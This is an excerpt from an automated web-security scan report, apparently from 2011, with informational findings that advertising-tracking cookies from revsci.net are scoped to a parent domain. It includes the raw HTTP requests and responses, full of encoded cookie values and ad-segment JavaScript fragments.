udm_0=MLvvMC8OYS5rXbhG0229qE0ZZfVJSgtZ3qm5UxlJJg5z0SgJjDXMFNBaSH5FXKC5uMqMAYe3LnBJoN6KPJ5HmNpTftzasLOHbXUlexEySdBWwp2Urdu/CXqTkn9cRAWShk8yvFMXXiZeKesq7T/19NheQTJDBBTk2qlhMbrFQpzyNaoubYDZepM0IRpzBbvFPy+RadE3K99sIyt19cE/FUnJXUWZ3rLpRhaqLQCuQnEUYKNgfxIroIgJOs97SEJzE5B8ZRKDjSjhO2Ul6pM1TT9m9fBJkQqq/I7he/sHSigrXjyTu/VjAn9g/UmRqoEMBmneape7UJpZttpKR94xyX4KIDp3dXMB/aMPHiYrjInN8zABRWWvjEldLk+gLcPrnIyAg9jsTsxqTXRWlJxdEhIXhBkuzmqecbK9Uol+ctG7vC2Di7U7vzvvmCl0KqyGN1s7jkATO13CT2AfTAj/2luWCZVEmru9XxLnzj8fVJ5qz2UjxOsOlVzXP1yaE6Yyz1q1bKnPVjC0z3RzAXYKtpBi4m1d1V4ps/12UOJl01RfH9Gv1ghVttQC7jd7y5eMBOdQpwlmW8m90g8peBVGtUjfGGcW+RMFhTBwciO3VAk3eLwGXIswRNpdrTYdgOLvqVAdHjKkRvS4u1c46i99S30PU14kF4lRsnIfXwUNmI8cxApAit9XGXI5hLKF//4eAsPFdcUdKLGku2Vyx3spIyCzJrke3Zm1lmWoeTZKTTn/dXO0VEg7yML/KhsJCFmJNEd1iOyPU9Pe1hqCLYPT8D685EyF; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvMC8OYS5rXbhG0229qE0ZZfVJSgtZ3qm5UxlJJg5z0SgJjDXMFNBaSH5FXKC5uMqMAYe3LnBJoN6KPJ5HmNpTftzasLOHbXUlexEySdBWwp2Urdu/CXqTkn9cRAWShk8yvFMXXiZeKesq7T/19NheQTJDBBTk2qlhMbrFQpzyNaoubYDZepM0IRpzBbvFPy+RadE3K99sIyt19cE/FUnJXUWZ3rLpRhaqLQCuQnEUYKNgfxIroIgJOs97SEJzE5B8ZRKDjSjhO2Ul6pM1TT9m9fBJkQqq/I7he/sHSigrXjyTu/VjAn9g/UmRqoEMBmneape7UJpZttpKR94xyX4KIDp3dXMB/aMPHiYrjInN8zABRWWvjEldLk+gLcPrnIyAg9jsTsxqTXRWlJxdEhIXhBkuzmqecbK9Uol+ctG7vC2Di7U7vzvvmCl0KqyGN1s7jkATO13CT2AfTAj/2luWCZVEmru9XxLnzj8fVJ5qz2UjxOsOlVzXP1yaE6Yyz1q1bKnPVjC0z3RzAXYKtpBi4m1d1V4ps/12UOJl01RfH9Gv1ghVttQC7jd7y5eMBOdQpwlmW8m90g8peBVGtUjfGGcW+RMFhTBwciO3VAk3eLwGXIswRNpdrTYdgOLvqVAdHjKkRvS4u1c46i99S30PU14kF4lRsnIfXwUNmI8cxApAit9XGXI5hLKF//4eAsPFdcUdKLGku2Vyx3spIyCzJrke3Zm1lmWoeTZKTTn/dXO0VEg7yML/KhsJCFmJNEd1iOyPU9Pe1hqCLYPT8D685EyF; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:14 GMT
Content-Length: 444

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72861','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126
...[SNIP]...

11.32. http://pix04.revsci.net/F09828/a4/0/0/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:56 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

11.33. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I07714/b3/0/3/1008211/304415100.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFOMnC7gMMU594t/Sn7ey31RI0YjFJAbeHbXhIfrk4Ow++ZH8gIQtYr8iWg2RZvh/nqSuFNyBKWw8Xyc7c/RIna/1WF9Q8p6WStaYJPam7yG21EA//kgEQ6MuyzqUKz7IUGE71nqp5Au9VMkKc/okTNLTXO89O6DKukkzJFi3MA0P6larBAMm1+anARqSwCEH+pmFjv+pITclEQ9S5f07ns5ipgm0hyliLId0YqoxKyXj/KVYnPmJ3S57oyns/3A==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
rtc_wRZH=MLsvsKMucD5nJRGm+X48W1s+JnWw2pAhBM0cosZtfJ9ViXcJRkBPy031UQhZHBj2vSo7My1zYrWwcschx0t7TSkF8tieuR/3XAVwFM0lt/amf/M8PVJdtTynoppWQLwUyw+nQ4vnPoZ4ecjmuzsYWm/I2N73KKVfeX8CHvaFRB/odeHTVhMokPrgK0qQ+4F3yU2W660bYz6wEhP5v4RYC/mf52PIfQqOyndNLJkQCFD+6kkfncm9CKn0SA3XJsqyB7uYxqUSa1VKB2R0mTF1Ysy+cH5CU7aekURYILu4a+PbQ0i+M6NDTvAB/ZnFaR0vRSvwLSTwhp/efqpVeBpt7fymb4N5xV/bBbuIdvrIVZNthFUL8XeqVq3HZxhXhVSm+7A7svJUS5WwVMRvjIc4MEZPO4teely4a6ukWwMIWcaNZJCu8pdF3Xk+rpnQ6GfVFyq9jR0AvAhLLm6Ma1/MjwM=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I07714/b3/0/3/1008211/304415100.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F04%252Fus-weather-football-idUSTRE78222D20110904%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2ZL1poyhgAWP5Eo4es3kaxW1feYH1YNm+vskrklkV+oIYNjONkByQANVsWNKqFQO5wXMuBl7LrFt9VvH8daQXgvCcc/xZFhpDSH3U4HVbBCIoq/8l/NhnpvaGiiSSrZ8kLGKEIhEwyeTfwOOT0SH98jWN4RywPgioVk8tTltp1p0UlKh8pgAGbJtLLHkzZlncToQPlWxsAy98jyGBAAGwnO3E3u1CL1AuqIBOad2NbOMmZnVBuDsFEtCusRTpf/eP/rfkboM67xVj/XJhGJYPg+W1/zwFI+aFZufGfL+/Z2SQplGqOPI3tNqk8XcE/ujqbTMA1byRkoOorO0+utOKrV87/bLRlYgLprcZr9jfXUBea5L0E99DIw7QmAt9edXA+GWvypoqWxSb7VjYfhviS1vMgyxtybpLpHkmK1YEkJDfxQLh8YRaLfzKLz9BGeRcG/pbGfe3l2iiQU9uA+5pAvvp0MUzDDsQe9Sxw2VU8g6kwqJaqi1jlhlid2LSxhnMJEYMo1sSEx1lsTmfmwdqW4L5W4G6MvPfoCl8AxFxP3k/qZn7W1GCq/vqvjZaJnVKmB9Hclql4FSg2qEI3GVbWPBpVcLHgkPV4kOsfhpa2otVl8jHM7XiwUaaHqTtyjHssQJ17jWcQW5bImC3mymJMwAsGhRzzFoHqEDMZQHWG0FCAaf0r/KQ29FcsMtODjzAtYrezVobTBqbH0qnPV8opyGyzm/uyJoXbzFgdk/tQ6w/7qGwbFrT2Z9Y73puC4yVjAfoDfL6udmM8uk3wTJPMW7M2qrSoxIM+ISFCWM2S3FH+8zXSctZMYCpANgDpbjA3qEy0TwLAonkipN1YQag6ZCxVL+vqRh6ruSTB1r70g=="; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=MLv38FMJbiprpr4pgtCoa4a5xWExsOFqd64VnOKEYktoA24C/Ef+EZx1Twi0VADHUAlWk1TBjtT/2wnC6cxBIL3UgC39ISGlxvNxpO1oE0PLF3lKZ1eQq53SUKdS/qq/nNz4iZtcnTXD4iJTfaogQ3MSCq8mqbKhgKfOgOhC+Skc/P20cerX3Xtn8x2Tg57iLmhn5VQ0d5f9VPDzx6GAB9kD+rzx8V/IIzOmhoiWkpNqDJYG0rudGFCpEE3z8NZEw/S0otIypuzNuO1GjcG2YfSplGNhzWWAeY58TBvMrLba24vGp4xXT/9NE8rRl7JYWg5dAoMwfBDHBPRiMmUjfmfj5iE2BJ/yJTB8x3Q2uD0ayEAlhbg+55kuVXtrdg5QNiQuFzMMSSg5AB5A5PEfiLGlDe7AS0lHizhvMPwozEUDRRF2Z2Ar3Er7l6nnASLKWLksCGwfnyIj8jdIqZUxgDjxLhFEW86A2Wj1ING+F1tBHwgXAopFzMsNLaOYfjK4Sjm2BxKI58zliylLdXlqhimol4D+LoKuE2SG+NsQrWR9fahC6aB7SHsyUqJL+VIL+SlbiOKCRr/zGS8ri9i10yXQuP+hVzAaDO2XJHZA5r52gi3+c/5nAIDMvZvWL+14BRDbo/fqhY2cENg3zMwC0lpAv8KsUYiRXkDGEdU0N4MyDFW++3rom4Q8TgytGdfG8bldhmHocPcH6QQqLASsZ8Of2g2SGZWGPrV8zujE28C1OH4S5vrTMm/5wrCgJTlflBSmSogRkoIGyA1XMDChko0HCLF8nJakqfhMLV5MS1kbL/tXQX5BvgJR8ACuqio0XBjFb9JKtX0r+bnLUxLHy1TcjLaPSqGy3RZDY5hm1KcEZIrs++s4/ynkigb88vqv00+3C42ZxsKH/Xc3w5BUu1606GbIiD5tiegmwuLRaqVzkeQLaNSoBc4cjaoXuA+HQZN3QnnC6yxyVviBT8jmQVYoTTj4tv417hPYBLsLr16d/Bm2YQxuHd6cZUgMwfs=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
